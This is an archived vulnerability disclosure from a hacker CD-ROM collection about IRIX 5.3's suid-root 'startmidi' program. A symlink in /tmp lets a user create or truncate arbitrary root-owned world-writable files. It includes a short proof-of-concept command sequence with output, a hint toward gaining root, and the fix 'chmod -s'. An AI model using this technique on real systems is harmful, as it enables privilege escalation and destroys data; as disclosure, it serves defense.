home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / startmidi.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  782 b   |  21 lines
  1. Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
  2. noticed a little suid-root program called 'startmidi' which hides in
  3. /usr/sbin. When run, this program creates various files in /tmp. You
  4. guessed it, it respects umask and follows symlinks. Comme ca:
  5.  
  6. % umask 0
  7. % ln -s /blardyblar /tmp/.midipid
  8. % startmidi -d /dev/ttyd1
  9. % ls -l /blardyblar
  10. -rw-rw-rw-    1 root     pgrad          0 Feb  9 17:46 /blardyblar
  11. % stopmidi -d /dev/ttyd1
  12. %
  13.  
  14. Any existing files are trucated to zero length. New files are created
  15. root-owned, mode 0666. I leave it to your furtive imaginations to get
  16. root from this. 'stopmidi' removes the files created by 'startmidi' so
  17. you may have to run that first if /tmp/.midipid already exists.
  18.  
  19. chmod -s /usr/sbin/startmidi fixes this problem.
  20.  
  21.